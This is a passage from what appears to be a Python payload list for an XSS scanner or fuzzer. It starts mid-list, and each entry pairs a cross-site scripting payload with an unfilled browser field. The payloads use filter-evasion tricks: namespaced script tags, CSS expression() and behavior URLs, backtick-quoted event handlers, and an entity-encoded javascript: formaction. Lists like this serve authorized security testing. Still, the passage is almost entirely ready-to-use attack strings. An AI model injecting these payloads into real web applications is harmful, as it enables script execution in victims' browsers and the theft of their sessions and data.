          'browser':"""[Not Info]"""},
        { 'payload':'''<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(PAYLOAD);</x:script>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<x style="background:url('x&#1;;color:red;/*')">PAYLOAD</x>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<x style="background:url('x[a];color:red;/*')">PAYLOAD</x>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<x style=behavior:url(#Zault#time2) onbegin=alert(PAYLOAD)>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<x style=x:expression(alert(PAYLOAD))>''',
          'browser':"""[Not Info]"""},
        { 'payload':'''X<x style=`behavior:url(#Zault#time2)` onbegin=`javascript:alert(PAYLOAD)` >''',
          'browser':"""[Not Info]"""},
        { 'payload':'''X<x style=`behavior:url(#Zault#time2)` onbegin=`write(PAYLOAD)` >''',
          'browser':"""[Not Info]"""},
        { 'payload':'''<form><button formaction=javascript&colon;PAYLOAD>Y''',
          'browser':"""[Not Info]"""}
]
